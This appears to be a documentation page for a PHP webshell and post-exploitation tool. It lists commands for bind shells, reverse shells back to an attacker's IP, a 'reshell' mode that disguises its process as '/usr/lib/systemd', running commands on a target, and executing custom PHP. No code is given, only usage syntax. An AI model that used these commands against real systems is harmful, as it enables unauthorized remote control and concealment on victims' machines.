SHELL
最后更新于
这有帮助吗?
这有帮助吗?
bind shell
Bind a port and wait for someone to connect to get a shell.
eg: bindshell {port=7777} {passwd=doughnuts}
Command Args:
--port [int] port (Default: 7777)
--passwd [str] passwd (Default: 'doughnuts')
reverse
reverse shell to a host from target system.
eg: reverse {ip} {port} {type=php}
reverse_type:
- php
- python
Command Args:
--ip(*) [str] ip
-p,--port(*) [str] port
-type,--reverse_type [str] reverse_type (Default: 'php')
reshell
Bind a port and wait for target connect back to get a full shell.
eg: reshell {lhost} {port} {type=[python|script|upload]{1|2|3},default = 0 (Python:1 Not Python:3)} {(Only for Mode 2) fakename=/usr/lib/systemd}
Command Args:
-l,--lhost(*) [str] lhost
-p,--port(*) [int] port
-m,--mode [int] mode (Default: 0)
-f,--fakename [str] fakename (Default: '/usr/lib/systemd')
shell
Get a temporary shell of target system by system function or just run a shell command.
Command Args:
--commands(*) [?] *commands
webshell
Get a webshell of target system or just run a webshell command.
Command Args:
--commands(*) [?] *commands
execute
execute Custom PHP code by notepad / vi or your own editor.
eg: execute {editor=""}
Command Args:
--editor [str] editor (Default: '')